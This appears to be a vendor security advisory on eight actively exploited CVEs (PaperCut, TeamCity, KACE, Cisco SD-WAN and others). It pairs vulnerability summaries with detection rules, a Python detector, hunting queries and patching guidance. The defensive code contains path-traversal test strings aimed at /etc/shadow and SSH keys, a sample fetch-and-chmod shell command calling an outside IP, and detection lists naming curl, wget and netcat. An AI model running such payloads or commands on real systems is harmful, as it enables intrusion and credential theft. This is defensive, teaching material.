On April 20, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added eight critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. This addition signals confirmed active exploitation in the wild, affecting a broad spectrum of enterprise infrastructure ranging from print management and CI/CD servers to systems management appliances and SD-WAN controllers.
The inclusion of CVE-2023-27351 (PaperCut), CVE-2024-27199 (JetBrains TeamCity), and CVE-2025-32975 (Quest KACE) is particularly concerning due to their prevalence in enterprise environments and the severity of the impact—Remote Code Execution (RCE). The Cisco Catalyst SD-WAN Manager vulnerabilities (CVE-2026-20122, CVE-2026-20128, CVE-2026-20133) further expose critical network management layers to credential theft and unauthorized API access.
Defenders must treat these vulnerabilities as active incident triggers. Under Binding Operational Directive (BOD) 22-01, federal civilian executive branch (FCEB) agencies have strict deadlines to remediate these vulnerabilities; private sector organizations should align with this urgency to prevent ransomware or data extortion attempts.
Technical Analysis
The following vulnerabilities have been confirmed as exploited in the wild:
1. PaperCut NG/MF (CVE-2023-27351)
- Type: Improper Authentication leading to RCE
- Affected Component: PaperCut Application Server
- Mechanism: An attacker can bypass authentication to execute arbitrary code on the underlying operating system. This vulnerability has been historically leveraged by ransomware operators (e.g., Bl00dy) to move laterally from IT infrastructure to domain controllers.
2. JetBrains TeamCity (CVE-2024-27199)
- Type: Path Traversal
- Affected Component: JetBrains TeamCity (On-Premise)
- Mechanism: This path traversal vulnerability allows unauthenticated attackers to bypass authentication mechanisms and gain administrative control of the TeamCity server. Successful exploitation leads to full compromise of the CI/CD pipeline, allowing attackers to inject malicious code into software builds or steal developer secrets.
3. Quest KACE Systems Management Appliance (CVE-2025-32975)
- Type: Improper Authentication / RCE
- Affected Component: KACE SMA
- Mechanism: Attackers can exploit improper authentication checks to execute arbitrary system commands. As KACE SMA is often used for deployment and patching, compromising this appliance provides an attacker with a "God-mode" view and control over managed endpoints.
4. Kentico Xperience (CVE-2025-2749)
- Type: Path Traversal
- Affected Component: Kentico Xperience CMS
- Mechanism: Allows attackers to read or write files on the server via path traversal sequences. While often used for source code disclosure, it can lead to RCE if combined with other techniques or file upload vulnerabilities.
5. Synacor Zimbra Collaboration Suite (CVE-2025-48700)
- Type: Cross-site Scripting (XSS)
- Affected Component: ZCS Web Client
- Mechanism: Reflected XSS allows attackers to execute arbitrary scripts in the context of a victim's browser. This is frequently used to steal session cookies or credentials, leading to account takeover.
6. Cisco Catalyst SD-WAN Manager (CVE-2026-20122, CVE-2026-20128, CVE-2026-20133)
- Type: Incorrect Use of Privileged APIs, Recoverable Passwords, Sensitive Info Exposure
- Affected Component: Cisco Catalyst SD-WAN Manager (formerly vManage)
- Mechanism: These chained vulnerabilities expose the management plane. Attackers can abuse privileged APIs without authentication, retrieve passwords stored in recoverable formats, and exfiltrate sensitive configuration data. This provides a roadmap for attackers to pivot into the broader software-defined WAN fabric.
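Items 2 and 4 above are both path-traversal bugs. As an added illustration of that bug class (this is example code written for this page, not code from the original post or from JetBrains or Kentico), the Python below puts the naive pattern, which concatenates a caller-supplied path onto a base directory, next to a hardened resolver that percent-decodes once, normalises separators and accepts only paths that land strictly inside the base directory. The base directory and the request paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Constructed example: the directory a download endpoint is meant to serve from.
BASE_DIR = "/var/www/app/uploads"


def resolve_naive(base: str, user_path: str) -> str:
    """'Before' pattern: decode (as the web framework would), join onto the base
    and normalise. normpath collapses '../' segments straight across the base
    boundary, so '../../etc/passwd' resolves to a file outside the directory."""
    return posixpath.normpath(posixpath.join(base, unquote(user_path)))


def resolve_safe(base: str, user_path: str):
    """Hardened pattern: decode once, normalise separators, then require the
    normalised result to sit strictly inside the base directory.
    Returns the resolved path, or None for anything that must be rejected."""
    decoded = unquote(user_path)          # "%2e%2e%2f" becomes "../"
    if "\x00" in decoded:                 # NUL bytes truncate paths in C-backed APIs
        return None
    decoded = decoded.replace("\\", "/")  # treat Windows separators like '/'
    if decoded.startswith("/"):           # join() discards base for absolute paths
        return None
    base_norm = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base_norm, decoded))
    # Strict prefix check: the candidate must be *below* base, not base itself and
    # not a sibling that merely shares a string prefix ("/var/www/app/uploads2").
    if not candidate.startswith(base_norm + "/"):
        return None
    return candidate


def triage(requests, base=BASE_DIR):
    """Run both resolvers over a batch of request paths and report, per request,
    where the naive code would have read from and whether the hardened check
    rejected it. Handy when reviewing access logs for traversal attempts."""
    base_norm = posixpath.normpath(base)
    report = []
    for req in requests:
        naive = resolve_naive(base, req)
        report.append({
            "request": req,
            "naive_target": naive,
            "escapes_base": not naive.startswith(base_norm + "/"),
            "hardened_result": resolve_safe(base, req),
        })
    return report


# Constructed sample requests: one benign, the rest traversal variants.
# The backslash form only escapes on a Windows host; the POSIX view keeps it
# inside, which is why the hardened resolver normalises separators first.
SAMPLE_REQUESTS = [
    "reports/q1.pdf",
    "../../etc/passwd",
    "%2e%2e/%2e%2e/etc/shadow",
    "..\\..\\windows\\win.ini",
    "/etc/hosts",
    "docs/../../../root/.ssh/id_rsa",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_REQUESTS):
        print(row)
```

The strict `base + "/"` prefix test is the part most often got wrong: checking `startswith(base)` alone lets `/var/www/app/uploads2/...` through, and allowing the candidate to equal the base turns an empty path into a directory read.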
Detection & Response
Detecting exploitation of these vulnerabilities comes down to spotting the web application process (often Java/Tomcat based) spawning unauthorized system shells or reading files it has no business touching. The following rules focus on the high-severity RCE vectors affecting PaperCut, JetBrains, Quest, and Cisco.
Sigma Rules
---
title: Potential Web Shell Execution via Java App Server
id: 8a4b2c1d-6e9f-4a3b-8c5d-1e2f3a4b5c6d
status: experimental
description: Detects Java-based web servers (PaperCut, TeamCity, KACE, SD-WAN) spawning Windows command shells or PowerShell, indicative of RCE exploitation.
references:
    - https://www.cisa.gov/news-events/alerts/2026/04/20/cisa-adds-eight-known-exploited-vulnerabilities-catalog
author: Security Arsenal
date: 2026/04/20
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\java.exe'
            - '\javaw.exe'
            - '\tomcat.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    filter_legit:
        # Excludes shells whose command line points at the products' own install paths
        # (their maintenance scripts). Drop this filter to treat every Java -> shell spawn as suspicious.
        CommandLine|contains:
            - 'C:\Program Files\PaperCut'
            - 'C:\Program Files\JetBrains'
            - 'C:\Program Files (x86)\Quest\'
            - 'vmanage'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate administrative debugging (rare)
level: critical
---
title: Unix/Linux Web Shell Execution via Java/Tomcat
id: 9b5c3d2e-7f0a-5b4c-9d6e-2f3a4b5c6d7e
status: experimental
description: Detects Java or Tomcat services spawning shells (bash/sh) on Linux, typical for exploitation of TeamCity, KACE, or Cisco SD-WAN Manager.
references:
    - https://www.cisa.gov/news-events/alerts/2026/04/20/cisa-adds-eight-known-exploited-vulnerabilities-catalog
author: Security Arsenal
date: 2026/04/20
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        ParentImage|endswith:
            - '/java'
            - '/javaw'
            - '/tomcat'
            - '/jsvc'
        Image|endswith:
            - '/bash'
            - '/sh'
            - '/bin/dash'
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'chmod'
            - 'nc '
    condition: selection
falsepositives:
    - Legitimate system maintenance scripts
level: high
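The two Sigma rules above are written for a SIEM backend. To make the same logic testable offline, here is an added Python implementation (written for this page, not code from the original post or from any of the vendors) that applies the Windows and Linux rule conditions to process-creation events and, as the KQL and VQL hunts in this section do, attributes each hit to a product by keyword in the parent's command line. The event records, with their host names, paths and command lines, are constructed samples using Sysmon-style field names.

```python
import json

# Parent images treated as Java application servers (Sigma rules 1 and 2)
JAVA_PARENTS = {"java", "javaw", "tomcat", "jsvc"}
# Child images treated as shells on either platform
SHELLS = {"cmd", "powershell", "pwsh", "bash", "sh", "dash"}
# Product keywords used to attribute the parent to an affected product
APP_KEYWORDS = ("papercut", "teamcity", "kace", "vmanage")
# Windows rule: shells launched from the products' own install paths are filtered out
WINDOWS_LEGIT_PATHS = (
    "C:\\Program Files\\PaperCut",
    "C:\\Program Files\\JetBrains",
    "C:\\Program Files (x86)\\Quest\\",
    "vmanage",
)
# Linux rule: only shells whose own command line carries a download/exec token
LINUX_SUSPICIOUS_TOKENS = ("curl", "wget", "chmod", "nc ")


def image_name(path: str) -> str:
    """Lower-cased basename without a .exe suffix, for either path separator."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def matched_app(command_line: str):
    """Attribute a parent command line to a product keyword, or None."""
    lowered = command_line.lower()
    return next((k for k in APP_KEYWORDS if k in lowered), None)


def evaluate(event: dict):
    """Apply the rule for the event's platform. Returns an alert dict or None."""
    if image_name(event["ParentImage"]) not in JAVA_PARENTS:
        return None
    if image_name(event["Image"]) not in SHELLS:
        return None
    cmd = event.get("CommandLine", "")
    if event["product"] == "windows":
        # Sigma rule 1: selection and not filter_legit
        if any(p.lower() in cmd.lower() for p in WINDOWS_LEGIT_PATHS):
            return None
        rule, level = "Potential Web Shell Execution via Java App Server", "critical"
    else:
        # Sigma rule 2: the shell itself must show download / chmod / netcat activity
        if not any(tok in cmd for tok in LINUX_SUSPICIOUS_TOKENS):
            return None
        rule, level = "Unix/Linux Web Shell Execution via Java/Tomcat", "high"
    return {
        "rule": rule,
        "level": level,
        "host": event["Computer"],
        "app": matched_app(event.get("ParentCommandLine", "")),
        "child": event["Image"],
        "command_line": cmd,
    }


def run_detection(events):
    """Evaluate a batch of events and return only the alerts."""
    return [a for a in (evaluate(e) for e in events) if a]


# Constructed sample events (hosts, paths and command lines are made up).
PAPERCUT_JAVA = "C:\\Program Files\\PaperCut NG\\server\\runtime\\jre\\bin\\java.exe"
SAMPLE_EVENTS = [
    {   # Windows: PaperCut's JVM launches cmd.exe running a recon command -> hit
        "product": "windows", "Computer": "PRINT-SRV01",
        "ParentImage": PAPERCUT_JAVA, "ParentCommandLine": f'"{PAPERCUT_JAVA}" -jar server.jar',
        "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami /all",
    },
    {   # Windows: same JVM, shell runs a script under the product's own path -> filtered
        "product": "windows", "Computer": "PRINT-SRV01",
        "ParentImage": PAPERCUT_JAVA, "ParentCommandLine": f'"{PAPERCUT_JAVA}" -jar server.jar',
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": 'cmd.exe /c "C:\\Program Files\\PaperCut NG\\server\\bin\\win\\maintenance.bat"',
    },
    {   # Linux: TeamCity's JVM spawns sh that fetches and chmods a file -> hit
        "product": "linux", "Computer": "ci-build-02",
        "ParentImage": "/opt/TeamCity/jre/bin/java",
        "ParentCommandLine": "/opt/TeamCity/jre/bin/java -jar /opt/TeamCity/webapps/ROOT/WEB-INF/lib/server.jar",
        "Image": "/bin/sh",
        "CommandLine": 'sh -c "curl -s http://203.0.113.10/s -o /tmp/s && chmod +x /tmp/s"',
    },
    {   # Linux: TeamCity JVM runs its own agent script via bash, no download tokens -> no hit
        "product": "linux", "Computer": "ci-build-02",
        "ParentImage": "/opt/TeamCity/jre/bin/java",
        "ParentCommandLine": "/opt/TeamCity/jre/bin/java -jar server.jar",
        "Image": "/bin/bash", "CommandLine": "bash /opt/TeamCity/buildAgent/bin/agent.sh start",
    },
    {   # Windows: shell spawned by Explorer, not a Java parent -> no hit
        "product": "windows", "Computer": "WKS-0142",
        "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE",
        "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe",
    },
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Matching on the image basename rather than the full path mirrors the `endswith` modifiers in the rules; the Linux token list is what keeps rule 2 at `high` rather than `critical`, since a bare shell under a JVM is routine for build agents and maintenance scripts.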
KQL (Microsoft Sentinel / Defender)
// Hunt for Java/Tomcat processes spawning shells or download utilities (curl/wget) that may fetch second-stage tooling
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("java.exe", "javaw.exe", "tomcat.exe", "java", "tomcat", "jsvc")
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "dash", "curl", "wget")
// Capture the product keyword itself so attribution works wherever it appears in the parent command line
| extend MatchedApp = extract(@'(papercut|teamcity|kace|vmanage)', 1, tolower(InitiatingProcessCommandLine))
| where isnotempty(MatchedApp)
| project Timestamp, DeviceName, MatchedApp, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, CommandLine
Velociraptor VQL
-- Hunt for Java processes spawning suspicious child processes on Linux/Windows.
-- pslist() reports only the Ppid, so the parent's name and command line come from a
-- second pslist(pid=...) lookup. The regexes are anchored so that 'sh' does not also
-- match ssh, zsh or fish (VQL regex matching is case-insensitive).
SELECT Pid, Name, CommandLine, Exe, Username, Ppid,
       { SELECT Name, CommandLine FROM pslist(pid=Ppid) } AS Parent
FROM pslist()
WHERE Name =~ '^(cmd|powershell|pwsh|bash|sh|dash)(\.exe)?$'
  AND Parent[0].Name =~ '^(java|javaw|tomcat|jsvc)(\.exe)?$'
  AND Parent[0].CommandLine =~ 'PaperCut|TeamCity|KACE|vmanage|tomcat'
Remediation Script (PowerShell)
This script checks for the presence of vulnerable PaperCut, JetBrains TeamCity, and Quest KACE services on Windows endpoints to aid in asset identification.
# Check for vulnerable services presence (Asset Identification)
Write-Host "Scanning for vulnerable services related to CISA KEV (April 2026)..." -ForegroundColor Cyan

# Process-name fragments plus the install paths to probe. The paths are the products'
# common default locations (TeamCity installs to C:\TeamCity by default; the KACE agent
# lives under Quest\KACE, or Dell\KACE on older installs); adjust for non-default installs.
# PaperCut's application server runs as pc-app.exe, hence the second pattern.
$VulnerableServices = @(
    @{Name="PaperCut Application Server"; Patterns=@("papercut", "pc-app"); Paths=@("C:\Program Files\PaperCut*")},
    @{Name="JetBrains TeamCity"; Patterns=@("TeamCity"); Paths=@("C:\Program Files\JetBrains\TeamCity*", "C:\TeamCity")},
    @{Name="Quest KACE SMA Agent"; Patterns=@("KACE"); Paths=@("C:\Program Files (x86)\Quest\KACE", "C:\Program Files (x86)\Dell\KACE")}
)

$Found = $false
foreach ($svc in $VulnerableServices) {
    # Check running processes (ProcessName has no .exe suffix)
    $proc = Get-Process -ErrorAction SilentlyContinue | Where-Object {
        $name = $_.ProcessName
        ($svc.Patterns | Where-Object { $name -like "*$_*" }).Count -gt 0
    }

    # Check common installation paths (Test-Path accepts wildcards)
    $pathExists = $false
    foreach ($p in $svc.Paths) {
        if (Test-Path $p) { $pathExists = $true }
    }

    if ($proc -or $pathExists) {
        Write-Host "[ALERT] Potential vulnerable installation found: $($svc.Name)" -ForegroundColor Red
        # $proc may hold several processes; report each one
        foreach ($pr in @($proc)) {
            if ($pr) { Write-Host "  Running Process: $($pr.ProcessName) (PID: $($pr.Id))" }
        }
        $Found = $true
    }
}

if (-not $Found) {
    Write-Host "No immediate indicators of these specific vulnerable applications found on this host." -ForegroundColor Green
}
Remediation
Immediate action is required to secure affected environments.
1. Patching & Updates
- PaperCut NG/MF: Update to the latest version. Refer to PaperCut Security Advisory for specific fixed builds addressing CVE-2023-27351.
- JetBrains TeamCity: Update to TeamCity 2023.05.3 or later.
- Quest KACE SMA: Apply the latest security patches from Quest Support for CVE-2025-32975.
- Kentico Xperience: Upgrade to the latest hotfix or version that mitigates CVE-2025-2749. Check the Kentico DevNet.
- Synacor Zimbra: Apply the patch for CVE-2025-48700 via the Zimbra Administration panel or CLI.
- Cisco Catalyst SD-WAN Manager: Update to a software release that fixes CVE-2026-20122, CVE-2026-20128, and CVE-2026-20133. Immediately rotate all API keys and passwords exposed on the appliance post-upgrade.
2. Network Isolation & Compensating Controls
If patching is not immediately possible:
- Isolate Management Consoles: Place TeamCity, PaperCut, KACE, and Cisco SD-WAN Manager behind VPNs or Zero Trust Network Access (ZTNA) solutions. Do not expose these interfaces directly to the public internet.
- Disable Unnecessary Services: If specific features (like file uploads or API endpoints) are not required, disable them via configuration settings.
- Audit Accounts: Review administrative logs for these applications for unfamiliar logins or unusual configuration changes dating back to at least April 2026.